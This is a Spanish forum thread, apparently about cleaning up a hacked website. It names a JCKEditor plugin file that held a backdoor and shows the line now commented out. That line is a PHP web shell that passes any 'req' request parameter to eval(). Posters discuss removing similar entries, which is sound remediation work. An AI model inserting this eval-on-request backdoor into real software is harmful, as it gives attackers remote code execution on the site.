Si se me olvido mencionarlo..
El archivo esta en
peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php
La linea uno contenía lo que puse en el post de arriba, y ahora tiene
PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD
Saludos
El archivo esta en
peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php
La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código
<?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>
PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD
Saludos
MUCHAS GRACIAS POR LA ACLARACIÓN Y POR TODO. Como dijo MinusFour, espero que esa línea no la utilicen para nada no?
¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.
Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.
Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.
Del mismo archivo dices o de cual?
Debo comentarlas tambien como hizo arriba !#drvy??